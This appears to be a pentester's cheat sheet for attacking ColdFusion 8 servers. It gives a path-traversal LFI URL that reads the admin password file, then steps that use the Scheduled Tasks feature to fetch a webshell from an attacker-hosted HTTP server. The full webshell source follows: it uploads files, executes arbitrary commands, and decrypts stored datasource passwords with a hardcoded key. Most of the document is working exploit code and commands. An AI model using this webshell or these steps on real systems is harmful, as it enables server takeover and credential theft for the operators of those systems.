ColdFusion 8
LFI http://10.11.1.10/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
Authenticated RCE 1. Expose webshell.cfm file 1. python3 -m http.server 8000
2. Scheduled Tasks -> Schedule New Task 1. Task Name: backdoor_download 2. URL: http://192.168.119.199:8000/webshell.cfm 3. Publish: True 4. File: c:\Inetpub\wwwroot\webshell.cfm
3. Open page -> http://10.11.1.10/webshell.cfm 1. Command: c:\windows\system32\cmd.exe
2. Options: /c whoami > c:\Inetpub\wwwroot\output.txt
3. Timeout: 5
5. Output 1. http://10.11.1.10/output.txt
webshell.cfm https://github.com/reider-roque/pentest-tools/blob/master/shells/webshell.cfm
<!-- Source: http://www.pwnag3.com/2013/04/coldfusion-for-pentesters-part-2.html -->
<html>
<body>
<!-- orig author: kGrutzmacher -->
<!-- additshonz: lawKnee -->
<b>Notes:</b><br>
<ul>
<li>Ccommand "c:\windows\system32\cmd.exe" or wherever cmd.exe is</li>
<li>Options " /c whoami > c:\Inetpub\wwwroot\output.txt"</li>
</ul>
<p>
<cfoutput>
<cfif isDefined("fileUpload")>
<cffile action="upload"
fileField="fileUpload"
destination="C:\">
<p>Your file has been uploaded.</p>
</cfif>
<form enctype="multipart/form-data" method="post">
<input type="file" name="fileUpload" /><br />
<input type="submit" value="Upload File" />
</form>
<table>
<form method="POST" action="">
<tr><td>Command:</td><td><input type=text name="cmd" size=50
<cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
<tr><td>Options:</td><td> <input type=text name="opts" size=50
<cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
<cfif isdefined("form.timeout")>value="#form.timeout#"
<cfelse>value="5"</cfif>></td></tr>
</table>
<input type=submit value="Exec" >
</form>
<cfif isdefined("form.cmd")>
<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#"
arguments = "#Form.opts#"
timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#HTMLCodeFormat(myVar)#
</pre>
</cfif>
<cfscript>
//The following code borrowed from hernanOchoa @hexale (thx)
//added better formatting on output and connection string [lb]
// Create Data Source Object
dataSourceObb=createobject("java","coldfusion.server.ServiceFactory").
getDatasourceService().getDatasources();
writeoutput("<br><br><b>Datasource Credentials:</b><br>");
writeoutput("<table>");
// Loop Through DataSources
for(i in dataSourceObb) {
if(len(dataSourceObb[i]["password"])){
// Get url
theurl=(dataSourceObb[i]["url"]);
// Get username
username=(dataSourceObb[i]["username"]);
// Get and decrypt password
decryptPassword=Decrypt(dataSourceObb[i]["password"],
generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede",
"Base64");
// Output datasource usernames, passwords, and urls
writeoutput("" &
"<tr><td>DataSource: " & i & "</td>" &
"<td>Username: " & username & "</td>" &
"<td>Password: " & decryptPassword &
"<td>URL: " & theurl & "</td></tr>");
}
}
writeoutput("</table><br>");
</cfscript>
</cfoutput>
</body>
</html>